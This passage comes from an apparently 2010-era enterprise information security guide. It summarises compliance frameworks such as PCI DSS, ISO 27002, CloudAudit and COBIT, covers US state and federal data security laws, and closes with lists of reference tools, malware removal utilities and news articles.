• Anti-Malware Software should be installed on systems to constantly monitor file access and detect dangerous code before it is allowed to launch. It should be centrally managed to ensure that it is active and kept up to date. Additional tools are sometimes necessary to clean stubborn infections. A list of reputable and effective tools is included in the resources section at the end of this document.
Regulations & Audit Frameworks

Audit Frameworks
Organizations report that enterprise security compliance is becoming increasingly difficult due to the complex nature and rapid pace of technology innovation and the fragmented compliance landscape. Critics complain that many security-related laws and regulations are overreaching and create a “culture of compliance”, focusing on verbose procedures rather than results. Many experts suggest that the less specific a regulation is, the more effective it is likely to be: making it technology neutral, not specifying what tools or products to use, but rather enabling organizations to select controls appropriate to the level of risk presented by a system. Several emerging standards strive to strike a balance by requiring a standardized, auditable and repeatable approach to managing information security; PCI DSS and CloudAudit A6 are examples.
• PCI DSS: The Payment Card Industry Security Standards Council was formed in 2006 with a mandate from the payment card industry to develop guidelines to protect consumers. The standard includes 12 requirements for any business that stores, processes or transmits payment cardholder data and specifies a framework for securing a payment environment. The 2008 standard went into effect July 2010. In October 2010, with feedback from over 1500 individuals representing 600 organizations around the world, including merchants, banks, and processors, PCI SSC updated the standard to Ver. 2.0, scheduled to go into effect January 2011 for 3 years. The new standard is reported to provide greater clarity and flexibility and to facilitate improved understanding of the requirements, simplifying implementation for merchants. The council provides certification for independent Qualified Security Assessors that can assist organizations in assessing and reaching compliance and filing the required reports. Though PCI compliance is not federally mandated, it is required by an increasing number of processors and merchant banks. Consequences of non-compliance can include $5K-$100K penalties per incident, lawsuits, insurance claims, canceled accounts, payment card issuer fines, government fines, etc. Because PCI DSS is not a law, it is important to know that supplier contracts stating that the solution complies with “all laws” don’t necessarily cover PCI.
• ISO/IEC 27002:2005 is an international standard that establishes guidelines for initiating, implementing, maintaining, and improving information security management in an organization. The objectives provide general guidance on the commonly accepted goals of information security management and specific controls in the following areas of information security management: security policy; asset management; HR security; environmental security; communications; access control; information systems acquisition, development and maintenance; security incident management; business continuity management; and compliance.
• CSA-CloudAudit A6: CloudAudit, an independent, global, non-profit organization, was officially launched in January 2010 with the active participation of many of the largest cloud computing providers, integrators and consultants. In October 2010 it became a project of the Cloud Security Alliance. The goal of CloudAudit is to provide a common interface and namespace that allows cloud computing providers to automate the Audit, Assertion, Assessment, and Assurance (A6) of their infrastructure (IaaS), platform (PaaS), and application (SaaS) environments, and to allow authorized consumers of their services to do likewise via an open, extensible and secure interface and methodology. The Cloud Security Alliance released an update to its security controls framework for cloud providers and cloud consumers which covers security controls relevant to all IT environments and addresses regulations including PCI-DSS, HIPAA, etc. http://cloudsecurityalliance.org/Research.html
• ISACA is an independent, nonprofit, global association that engages in the development, adoption and use of globally accepted practices for information systems. COBIT provides a framework to bridge the gap with respect to control requirements, technical issues and business risks, and to communicate that level of control to stakeholders. COBIT enables the development of clear policies and good practice for IT control throughout enterprises. Though not specific to the security realm, the process structure of COBIT and its high-level, business-oriented approach provide an end-to-end view of IT.
State & Federal Security Legislation
With different states mandating various forms of security controls, organizations are required to comply with multiple sets of “reasonable security” requirements for each state where they have customers, making compliance both confusing and expensive. As a consequence, there is growing focus on a single security control framework led by PCI DSS. Every company, whether or not directly affected by industry or governmental regulations, should have an explicit security policy encompassing how confidential data enters the organization, how it is accessed, and how it is stored and archived. The policy should include actions to be taken in the event of a security breach, which typically include customer and card issuer notification.
• California AB 1950 (2005) requires businesses that process personal information about California residents to “implement and maintain reasonable security procedures and practices to protect personal information from unauthorized access, destruction, use, modification or disclosure.” It has since been used as a basis for private and class action lawsuits and as a model for other states’ legislation, including Massachusetts, Minnesota, and Nevada.
• Washington HB 1149 (2010) provides issuing banks a legal mechanism to collect costs related to reissuing payment cards after a security breach. Unlike AB 1950, there is no explicit requirement to take reasonable care to avoid a breach, but companies that fail to do so may be liable to pay for re-issuance costs after a breach.
• Massachusetts 201 CMR 17 (2010) is regarded as the most comprehensive and calls for the discovery and protection of sensitive data in a manner that is absent from other laws being passed. It requires that every business that owns or licenses personal information about a resident of the Commonwealth of Massachusetts be in compliance. Personal data is defined as a resident’s first name and last name, or first initial and last name, in combination with any one or more of the following: SSN; driver’s license number or state-issued ID number; financial account number, or credit or debit card number, with or without any required security code, access code, personal identification number or password, that would permit access to a resident’s financial account.
• Federal Trade Commission Act, 15 U.S.C § 45(a). Currently there are no federal laws that explicitly mandate security controls, though the FTC has taken action by claiming that organizations have engaged in “unfair practices” in violation of Section 5(a) of the Federal Trade Commission Act, 15 U.S.C § 45(a). For example, the FTC took action and imposed a 20-year security audit requirement on TJX following the 2007 security breach involving 50-90 million credit cards. The ruling said that the company failed to use “adequate security” in protecting the card data. “Adequate security” remains undefined, though PCI DSS compliance would most likely satisfy the requirement.
References

Tools & Resources
• AV Comparatives Mobile Computing - http://www.av-comparatives.org/
• Security Tools - http://sectools.org/ids.html
• Cloud Security Alliance - http://cloudsecurityalliance.org
    o Security Guidance for Critical Areas of Focus in Cloud Computing V 2.1, Dec 2009
    o Top Threats to Cloud Computing V1.0, March 2010
• Internet Crime Complaint Center (IC3) - http://www.ic3.gov/default.aspx provides a set of guidelines on how to avoid Internet-related scams.
• Mobile Security Guide – Smartphones, Netbooks, Laptops, and PDAs - http://www.firewallguide.com/pda.htm
• Open Security Foundation DATALOSSdb - http://datalossdb.org
• OpenDNS Web content filtering - http://www.opendns.com
• Payment Card Industry Security Standards Council (PCI SSC) - https://www.pcisecuritystandards.org
• Pinpointing your Security Risks - http://www.itsecurity.com/features/pinpointing-your-security-risks-040507/
• Symantec Global Internet Security Threat Report Vol. XV, Pub 4/10 - http://symantec.com
• Ten Ways IT Enables Cybercrime, Sept 2010 - http://usa.kaspersky.com/resources
• The Top Cyber Security Risks - http://www.sans.org/top-cyber-security-risks/#
• U.S. Computer Emergency Readiness Team (U.S. CERT) - http://www.us-cert.gov/current/
• Malware Removal Tools
    o Malware Bytes - http://www.malwarebytes.org/
    o Spybot Search & Destroy - http://www.safer-networking.org/en/home/index.html
    o Spyware Removal Tools by ESET - http://www.eset.com/download/free-antivirus-utilities
    o Rkill - http://www.bleepingcomputer.com/forums/topic308364.html
    o ComboFix - http://www.bleepingcomputer.com/combofix/how-to-use-combofix
    o Hijack This! - http://free.antivirus.com/hijackthis/



Articles
• China Telcom Denies US web hijack allegations - The Economic Times, Nov 18, 2010
• Cyber Experts Have Proof That China Has Hijacked U.S.-Based Internet Traffic - http://www.nationaldefensemagazine.org
• Financial Services Like the Cloud, Provided it’s Private - http://www.informationweek.com/cloud-computing/blog/archives/2010/05/financial_servi.html
• Five Problems with SaaS Security, Jon Brodkin, NetworkWorld, Sept 2010
• Government Computer News (GCN) - http://gcn.com/articles/2010/03/29/cybereye-032910.aspx
• The States Take Action: 5/5/2010: Washington Becomes the 5th State to Give Data Privacy Some Legislative Teeth.
• Hackers find a Home in Amazon’s EC2 Cloud - http://www.infoworld.com/d/cloud-computing/
• Implications of Iran Cyberattack, Sept 2010 - http://www.theglobeandmail.com/news/technology
• Malware Security Report: Protecting Your Business, Customers, and the Bottom Line - Verisign 2010 whitepaper
• McAfee debacle shows why malware defense must evolve - http://www.pcworld.com/businesscenter
• New Malware Technique targets Intrusion-Prevention Systems - http://www.networkworld.com/news/2010/101810-malware-targets-ips.html
• Smartphones: The New Hacker Frontier - Light Reading Mobile - http://www.lightreading.com
• Sys admin gone rogue is biggest insider threat, Ellen Messmer, NetworkWorld, Sept 2010
• Take Back The Endpoint, Sept 2010 - http://usa.kaspersky.com/resources/
• The Business Mobility Explosion: Improve Data Security, Compliance and Manageability - http://www.itsecurity.com/events/business-mobility-explosion-its/
• The Hacker who went into the Cold - New York Times Magazine, Nov 14, 2010
• The Online Threat, Seymour M. Hersh, The New Yorker, November 2010
• The Risks of Social Networking, Candid Wuest - http://symantec.com
• U.S. Workers are on Alert After Breach of Data - New York Times, Nov 7, 2010
• You Need a Smartphone Security Suite - PCMag.com Security Watch Blog
• War in the fifth domain - The Economist, July 2010
• Web Malware 101, Jan 2010 - An iDefense Focused Intelligence Report